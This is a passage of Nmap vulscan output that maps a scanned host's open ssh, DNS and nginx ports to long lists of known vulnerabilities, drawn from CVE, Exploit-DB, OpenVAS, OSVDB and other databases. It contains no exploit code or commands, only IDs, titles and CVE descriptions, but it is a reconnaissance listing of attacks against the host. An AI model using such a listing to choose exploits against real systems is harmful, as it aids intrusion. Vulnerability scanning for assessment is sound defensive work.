7221| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
7222| [32975] Apple Mac OS X OpenSSH denial of service
7223| [32387] RHSA-2006:0738 updates for openssh not installed
7224| [32359] RHSA-2006:0697 updates for openssh not installed
7225| [32230] RHSA-2006:0298 updates for openssh not installed
7226| [32132] RHSA-2006:0044 updates for openssh not installed
7227| [30120] OpenSSH privilege separation monitor authentication verification weakness
7228| [29255] OpenSSH GSSAPI user enumeration
7229| [29254] OpenSSH signal handler race condition
7230| [29158] OpenSSH identical block denial of service
7231| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
7232| [25116] OpenSSH OpenPAM denial of service
7233| [24305] OpenSSH SCP shell expansion command execution
7234| [22665] RHSA-2005:106 updates for openssh not installed
7235| [22117] OpenSSH GSSAPI allows elevated privileges
7236| [22115] OpenSSH GatewayPorts security bypass
7237| [20930] OpenSSH sshd.c LoginGraceTime denial of service
7238| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
7239| [17213] OpenSSH allows port bouncing attacks
7240| [16323] OpenSSH scp file overwrite
7241| [13797] OpenSSH PAM information leak
7242| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
7243| [13264] OpenSSH PAM code could allow an attacker to gain access
7244| [13215] OpenSSH buffer management errors could allow an attacker to execute code
7245| [13214] OpenSSH memory vulnerabilities
7246| [13191] OpenSSH large packet buffer overflow
7247| [12196] OpenSSH could allow an attacker to bypass login restrictions
7248| [11970] OpenSSH could allow an attacker to obtain valid administrative account
7249| [11902] OpenSSH PAM support enabled information leak
7250| [9803] OpenSSH "
7251| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
7252| [9307] OpenSSH is running on the system
7253| [9169] OpenSSH "
7254| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
7255| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
7256| [8383] OpenSSH off-by-one error in channel code
7257| [7647] OpenSSH UseLogin option arbitrary code execution
7258| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
7259| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
7260| [7179] OpenSSH source IP access control bypass
7261| [6757] OpenSSH "
7262| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
7263| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
7264| [5517] OpenSSH allows unauthorized access to resources
7265| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
7266|
7267| Exploit-DB - https://www.exploit-db.com:
7268| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
7269| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
7270| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
7271| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
7272| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
7273| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
7274| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
7275| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
7276| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
7277| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
7278| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
7279| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
7280| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
7281| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
7282|
7283| OpenVAS (Nessus) - http://www.openvas.org:
7284| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
7285| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
7286| [881183] CentOS Update for openssh CESA-2012:0884 centos6
7287| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
7288| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
7289| [870763] RedHat Update for openssh RHSA-2012:0884-04
7290| [870129] RedHat Update for openssh RHSA-2008:0855-01
7291| [861813] Fedora Update for openssh FEDORA-2010-5429
7292| [861319] Fedora Update for openssh FEDORA-2007-395
7293| [861170] Fedora Update for openssh FEDORA-2007-394
7294| [861012] Fedora Update for openssh FEDORA-2007-715
7295| [840345] Ubuntu Update for openssh vulnerability USN-597-1
7296| [840300] Ubuntu Update for openssh update USN-612-5
7297| [840271] Ubuntu Update for openssh vulnerability USN-612-2
7298| [840268] Ubuntu Update for openssh update USN-612-7
7299| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
7300| [840214] Ubuntu Update for openssh vulnerability USN-566-1
7301| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
7302| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
7303| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
7304| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
7305| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
7306| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
7307| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
7308| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
7309| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
7310| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
7311| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
7312| [100584] OpenSSH X Connections Session Hijacking Vulnerability
7313| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
7314| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
7315| [65987] SLES10: Security update for OpenSSH
7316| [65819] SLES10: Security update for OpenSSH
7317| [65514] SLES9: Security update for OpenSSH
7318| [65513] SLES9: Security update for OpenSSH
7319| [65334] SLES9: Security update for OpenSSH
7320| [65248] SLES9: Security update for OpenSSH
7321| [65218] SLES9: Security update for OpenSSH
7322| [65169] SLES9: Security update for openssh,openssh-askpass
7323| [65126] SLES9: Security update for OpenSSH
7324| [65019] SLES9: Security update for OpenSSH
7325| [65015] SLES9: Security update for OpenSSH
7326| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
7327| [61639] Debian Security Advisory DSA 1638-1 (openssh)
7328| [61030] Debian Security Advisory DSA 1576-2 (openssh)
7329| [61029] Debian Security Advisory DSA 1576-1 (openssh)
7330| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
7331| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
7332| [60667] Slackware Advisory SSA:2008-095-01 openssh
7333| [59014] Slackware Advisory SSA:2007-255-01 openssh
7334| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
7335| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
7336| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
7337| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
7338| [57492] Slackware Advisory SSA:2006-272-02 openssh
7339| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
7340| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
7341| [57470] FreeBSD Ports: openssh
7342| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
7343| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
7344| [56294] Slackware Advisory SSA:2006-045-06 openssh
7345| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
7346| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
7347| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
7348| [53788] Debian Security Advisory DSA 025-1 (openssh)
7349| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
7350| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
7351| [11343] OpenSSH Client Unauthorized Remote Forwarding
7352| [10954] OpenSSH AFS/Kerberos ticket/token passing
7353| [10883] OpenSSH Channel Code Off by 1
7354| [10823] OpenSSH UseLogin Environment Variables
7355|
7356| SecurityTracker - https://www.securitytracker.com:
7357| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
7358| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
7359| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
7360| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
7361| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
7362| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
7363| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
7364| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
7365| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
7366| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
7367| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
7368| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
7369| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
7370| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
7371| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
7372| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
7373| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
7374| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
7375| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
7376| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
7377| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
7378| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
7379| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
7380| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
7381| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
7382| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
7383| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
7384| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
7385| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
7386| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
7387| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
7388| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
7389| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
7390| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
7391| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
7392| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
7393| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
7394| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
7395|
7396| OSVDB - http://www.osvdb.org:
7397| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
7398| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
7399| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
7400| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
7401| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
7402| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
7403| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
7404| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
7405| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
7406| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
7407| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
7408| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
7409| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
7410| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
7411| [56921] OpenSSH Unspecified Remote Compromise
7412| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
7413| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
7414| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
7415| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
7416| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
7417| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
7418| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
7419| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
7420| [43745] OpenSSH X11 Forwarding Local Session Hijacking
7421| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
7422| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
7423| [37315] pam_usb OpenSSH Authentication Unspecified Issue
7424| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
7425| [34601] OPIE w/ OpenSSH Account Enumeration
7426| [34600] OpenSSH S/KEY Authentication Account Enumeration
7427| [32721] OpenSSH Username Password Complexity Account Enumeration
7428| [30232] OpenSSH Privilege Separation Monitor Weakness
7429| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
7430| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
7431| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
7432| [29152] OpenSSH Identical Block Packet DoS
7433| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
7434| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
7435| [22692] OpenSSH scp Command Line Filename Processing Command Injection
7436| [20216] OpenSSH with KerberosV Remote Authentication Bypass
7437| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
7438| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
7439| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
7440| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
7441| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
7442| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
7443| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
7444| [6601] OpenSSH *realloc() Unspecified Memory Errors
7445| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
7446| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
7447| [6072] OpenSSH PAM Conversation Function Stack Modification
7448| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
7449| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
7450| [5408] OpenSSH echo simulation Information Disclosure
7451| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
7452| [4536] OpenSSH Portable AIX linker Privilege Escalation
7453| [3938] OpenSSL and OpenSSH /dev/random Check Failure
7454| [3456] OpenSSH buffer_append_space() Heap Corruption
7455| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
7456| [2140] OpenSSH w/ PAM Username Validity Timing Attack
7457| [2112] OpenSSH Reverse DNS Lookup Bypass
7458| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
7459| [1853] OpenSSH Symbolic Link 'cookies' File Removal
7460| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
7461| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
7462| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
7463| [688] OpenSSH UseLogin Environment Variable Local Command Execution
7464| [642] OpenSSH Multiple Key Type ACL Bypass
7465| [504] OpenSSH SSHv2 Public Key Authentication Bypass
7466| [341] OpenSSH UseLogin Local Privilege Escalation
7467|_
746853/tcp open domain (unknown banner: none)
7469| fingerprint-strings:
7470| DNSVersionBindReqTCP:
7471| version
7472| bind
7473|_ none
747480/tcp open http nginx
7475| vulscan: VulDB - https://vuldb.com:
7476| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
7477| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
7478| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
7479| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
7480| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
7481| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
7482| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
7483| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
7484| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
7485| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
7486| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
7487| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
7488| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
7489| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
7490| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
7491| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
7492| [67677] nginx up to 1.7.3 SSL weak authentication
7493| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
7494| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
7495| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
7496| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
7497| [65364] nginx up to 1.1.13 Default Configuration information disclosure
7498| [8671] nginx up to 1.4 proxy_pass denial of service
7499| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
7500| [7247] nginx 1.2.6 Proxy Function spoofing
7501| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
7502| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
7503| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
7504| [59645] nginx up to 0.8.9 Heap-based memory corruption
7505| [53592] nginx 0.8.36 memory corruption
7506| [53590] nginx up to 0.8.9 unknown vulnerability
7507| [51533] nginx 0.7.64 Terminal privilege escalation
7508| [50905] nginx up to 0.8.9 directory traversal
7509| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
7510| [50043] nginx up to 0.8.10 memory corruption
7511|
7512| MITRE CVE - https://cve.mitre.org:
7513| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
7514| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
7515| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
7516| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
7517| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
7518| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
7519| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
7520| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
7521| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
7522| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
7523| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
7524| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
7525| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
7526|
7527| SecurityFocus - https://www.securityfocus.com/bid/:
7528| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
7529| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
7530| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
7531| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
7532| [82230] nginx Multiple Denial of Service Vulnerabilities
7533| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
7534| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
7535| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
7536| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
7537| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
7538| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
7539| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
7540| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
7541| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
7542| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
7543| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
7544| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
7545| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
7546| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
7547| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
7548| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
7549| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
7550| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
7551| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
7552| [40420] nginx Directory Traversal Vulnerability
7553| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
7554| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
7555| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
7556| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
7557| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
7558|
7559| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7560| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
7561| [84172] nginx denial of service
7562| [84048] nginx buffer overflow
7563| [83923] nginx ngx_http_close_connection() integer overflow
7564| [83688] nginx null byte code execution
7565| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
7566| [82319] nginx access.log information disclosure
7567| [80952] nginx SSL spoofing
7568| [77244] nginx and Microsoft Windows request security bypass
7569| [76778] Naxsi module for Nginx nx_extract.py directory traversal
7570| [74831] nginx ngx_http_mp4_module.c buffer overflow
7571| [74191] nginx ngx_cpystrn() information disclosure
7572| [74045] nginx header response information disclosure
7573| [71355] nginx ngx_resolver_copy() buffer overflow
7574| [59370] nginx characters denial of service
7575| [59369] nginx DATA source code disclosure
7576| [59047] nginx space source code disclosure
7577| [58966] nginx unspecified directory traversal
7578| [54025] nginx ngx_http_parse.c denial of service
7579| [53431] nginx WebDAV component directory traversal
7580| [53328] Nginx CRC-32 cached domain name spoofing
7581| [53250] Nginx ngx_http_parse_complex_uri() function code execution
7582|
7583| Exploit-DB - https://www.exploit-db.com:
7584| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
7585| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
7586| [25499] nginx 1.3.9-1.4.0 DoS PoC
7587| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
7588| [14830] nginx 0.6.38 - Heap Corruption Exploit
7589| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
7590| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
7591| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
7592| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
7593| [9829] nginx 0.7.61 WebDAV directory traversal
7594|
7595| OpenVAS (Nessus) - http://www.openvas.org:
7596| [864418] Fedora Update for nginx FEDORA-2012-3846
7597| [864310] Fedora Update for nginx FEDORA-2012-6238
7598| [864209] Fedora Update for nginx FEDORA-2012-6411
7599| [864204] Fedora Update for nginx FEDORA-2012-6371
7600| [864121] Fedora Update for nginx FEDORA-2012-4006
7601| [864115] Fedora Update for nginx FEDORA-2012-3991
7602| [864065] Fedora Update for nginx FEDORA-2011-16075
7603| [863654] Fedora Update for nginx FEDORA-2011-16110
7604| [861232] Fedora Update for nginx FEDORA-2007-1158
7605| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
7606| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
7607| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
7608| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
7609| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
7610| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
7611| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
7612| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
7613| [100659] nginx Directory Traversal Vulnerability
7614| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
7615| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
7616| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
7617| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
7618| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
7619| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
7620| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
7621| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
7622| [71297] FreeBSD Ports: nginx
7623| [71276] FreeBSD Ports: nginx
7624| [71239] Debian Security Advisory DSA 2434-1 (nginx)
7625| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
7626| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
7627| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
7628| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
7629| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
7630| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
7631| [64894] FreeBSD Ports: nginx
